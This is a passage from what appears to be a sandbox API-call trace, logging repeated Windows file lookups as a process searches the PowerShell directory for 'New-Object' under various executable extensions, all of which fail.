ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.335] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.340] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.psm1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.340] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.340] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.psd1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.341] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.341] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.COM" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.com"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.341] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.341] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.EXE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.exe"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.342] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.342] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.BAT" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.bat"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.342] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.342] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.CMD" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.cmd"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.343] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.VBS" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.vbs"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.344] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.VBE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.vbe"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.344] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.344] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.JS" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.js"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.345] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.JSE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.jse"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.345] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.WSF" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.wsf"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.346] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.WSH" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.wsh"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.347] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.MSC" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.msc"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.347] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.CPL" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.cpl"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.348] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, 